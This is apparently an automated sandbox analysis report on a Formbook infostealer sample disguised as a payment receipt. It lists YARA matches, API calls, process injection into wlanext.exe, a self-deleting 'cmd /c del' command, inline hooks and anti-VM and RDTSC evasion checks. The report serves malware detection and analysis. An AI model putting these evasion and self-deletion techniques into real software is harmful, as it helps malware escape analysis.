          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Final-Payment-Receipt.exe
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419D70 NtCreateFile,1_2_00419D70
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419E20 NtReadFile,1_2_00419E20
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419EA0 NtClose,1_2_00419EA0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419F50 NtAllocateVirtualMemory,1_2_00419F50
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419DC2 NtCreateFile,1_2_00419DC2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419E1F NtReadFile,1_2_00419E1F
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419F4C NtAllocateVirtualMemory,1_2_00419F4C
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_013F9910
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F99A0 NtCreateSection,LdrInitializeThunk,1_2_013F99A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_013F9860
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9840 NtDelayExecution,LdrInitializeThunk,1_2_013F9840
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_013F98F0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A20 NtResumeThread,LdrInitializeThunk,1_2_013F9A20
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_013F9A00
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A50 NtCreateFile,LdrInitializeThunk,1_2_013F9A50
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9540 NtReadFile,LdrInitializeThunk,1_2_013F9540
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F95D0 NtClose,LdrInitializeThunk,1_2_013F95D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9710 NtQueryInformationToken,LdrInitializeThunk,1_2_013F9710
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_013F97A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9780 NtMapViewOfSection,LdrInitializeThunk,1_2_013F9780
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_013F9660
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_013F96E0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9950 NtQueueApcThread,1_2_013F9950
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F99D0 NtCreateProcessEx,1_2_013F99D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9820 NtEnumerateKey,1_2_013F9820
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FB040 NtSuspendThread,1_2_013FB040
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F98A0 NtWriteVirtualMemory,1_2_013F98A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9B00 NtSetValueKey,1_2_013F9B00
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA3B0 NtGetContextThread,1_2_013FA3B0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A10 NtQuerySection,1_2_013F9A10
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A80 NtOpenDirectoryObject,1_2_013F9A80
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FAD30 NtSetContextThread,1_2_013FAD30
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9520 NtWaitForSingleObject,1_2_013F9520
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9560 NtWriteFile,1_2_013F9560
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F95F0 NtQueryInformationFile,1_2_013F95F0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9730 NtQueryVirtualMemory,1_2_013F9730
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA710 NtOpenProcessToken,1_2_013FA710
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA770 NtOpenThread,1_2_013FA770
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9770 NtSetInformationFile,1_2_013F9770
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9760 NtOpenProcess,1_2_013F9760
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9FE0 NtCreateMutant,1_2_013F9FE0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9610 NtEnumerateValueKey,1_2_013F9610
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9670 NtQueryInformationProcess,1_2_013F9670
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9650 NtQueryValueKey,1_2_013F9650
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F96D0 NtCreateKey,1_2_013F96D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759A50 NtCreateFile,LdrInitializeThunk,3_2_03759A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_03759910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037599A0 NtCreateSection,LdrInitializeThunk,3_2_037599A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759860 NtQuerySystemInformation,LdrInitializeThunk,3_2_03759860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759840 NtDelayExecution,LdrInitializeThunk,3_2_03759840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759710 NtQueryInformationToken,LdrInitializeThunk,3_2_03759710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759FE0 NtCreateMutant,LdrInitializeThunk,3_2_03759FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759780 NtMapViewOfSection,LdrInitializeThunk,3_2_03759780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03759660
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759650 NtQueryValueKey,LdrInitializeThunk,3_2_03759650
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037596E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_037596E0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037596D0 NtCreateKey,LdrInitializeThunk,3_2_037596D0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759540 NtReadFile,LdrInitializeThunk,3_2_03759540
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037595D0 NtClose,LdrInitializeThunk,3_2_037595D0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759B00 NtSetValueKey,3_2_03759B00
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0375A3B0 NtGetContextThread,3_2_0375A3B0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759A20 NtResumeThread,3_2_03759A20
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759A10 NtQuerySection,3_2_03759A10
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759A00 NtProtectVirtualMemory,3_2_03759A00
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759A80 NtOpenDirectoryObject,3_2_03759A80
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759950 NtQueueApcThread,3_2_03759950
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037599D0 NtCreateProcessEx,3_2_037599D0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0375B040 NtSuspendThread,3_2_0375B040
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759820 NtEnumerateKey,3_2_03759820
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037598F0 NtReadVirtualMemory,3_2_037598F0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037598A0 NtWriteVirtualMemory,3_2_037598A0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0375A770 NtOpenThread,3_2_0375A770
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759770 NtSetInformationFile,3_2_03759770
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759760 NtOpenProcess,3_2_03759760
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759730 NtQueryVirtualMemory,3_2_03759730
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0375A710 NtOpenProcessToken,3_2_0375A710
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037597A0 NtUnmapViewOfSection,3_2_037597A0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759670 NtQueryInformationProcess,3_2_03759670
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759610 NtEnumerateValueKey,3_2_03759610
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759560 NtWriteFile,3_2_03759560
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0375AD30 NtSetContextThread,3_2_0375AD30
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03759520 NtWaitForSingleObject,3_2_03759520
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037595F0 NtQueryInformationFile,3_2_037595F0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC9EA0 NtClose,3_2_02EC9EA0
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC9E20 NtReadFile,3_2_02EC9E20
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC9F50 NtAllocateVirtualMemory,3_2_02EC9F50
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC9D70 NtCreateFile,3_2_02EC9D70
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC9E1F NtReadFile,3_2_02EC9E1F
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC9F4C NtAllocateVirtualMemory,3_2_02EC9F4C
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC9DC2 NtCreateFile,3_2_02EC9DC2
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 0371B150 appears 145 times
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: String function: 013BB150 appears 145 times
          Source: Final-Payment-Receipt.exe, 00000000.00000000.224938714.000000000009A000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000000.00000002.236173671.0000000005570000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameKedermister.dllT vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000001.00000002.263682500.000000000163F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000001.00000000.230648547.000000000095A000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000001.00000002.263300020.0000000001382000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamewlanext.exej% vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe Binary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Final-Payment-Receipt.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@5/3
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Final-Payment-Receipt.exe.log
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_01
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Final-Payment-Receipt.exe ReversingLabs: Detection: 34%
          Source: unknown Process created: C:\Users\user\Desktop\Final-Payment-Receipt.exe 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: unknown Process created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exe
          Source: unknown Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Process created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exe
          Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Final-Payment-Receipt.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Final-Payment-Receipt.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: Final-Payment-Receipt.exe, 00000001.00000002.263431017.00000000014AF000.00000040.00000001.sdmp, wlanext.exe, 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Final-Payment-Receipt.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: Final-Payment-Receipt.exe, 00000001.00000002.263288108.0000000001370000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: Final-Payment-Receipt.exe, 00000001.00000002.263288108.0000000001370000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 0_2_055E556E push eax; ret 0_2_055E556F
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0041B11C push es; iretd 1_2_0041B11D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0040E3C1 pushad ; ret 1_2_0040E3DA
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0040E417 pushad ; ret 1_2_0040E3DA
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_00417619 pushfd ; ret 1_2_0041761D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0041CEC5 push eax; ret 1_2_0041CF18
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0041CF7C push eax; ret 1_2_0041CF82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0041CF12 push eax; ret 1_2_0041CF18
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0041CF1B push eax; ret 1_2_0041CF82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0140D0D1 push ecx; ret 1_2_0140D0E4
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0376D0D1 push ecx; ret 3_2_0376D0E4
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02ECDA3E push 00000072h; ret 3_2_02ECDA40
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EBE3C1 pushad ; ret 3_2_02EBE3DA
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02ECB11C push es; iretd 3_2_02ECB11D
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02ECCEC5 push eax; ret 3_2_02ECCF18
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC7619 pushfd ; ret 3_2_02EC761D
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02ECCF7C push eax; ret 3_2_02ECCF82
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02ECCF1B push eax; ret 3_2_02ECCF82
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02ECCF12 push eax; ret 3_2_02ECCF18
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EBE417 pushad ; ret 3_2_02EBE3DA
          Source: initial sample Static PE information: section name: .text entropy: 7.8171947974

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Final-Payment-Receipt.exe PID: 1692, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; RDTSC instruction interceptor: First address: 00000000004098E4, second address: 00000000004098EA; instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; RDTSC instruction interceptor: First address: 0000000000409B5E, second address: 0000000000409B64; instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe; RDTSC instruction interceptor: First address: 0000000002EB98E4, second address: 0000000002EB98EA; instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe; RDTSC instruction interceptor: First address: 0000000002EB9B5E, second address: 0000000002EB9B64; instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
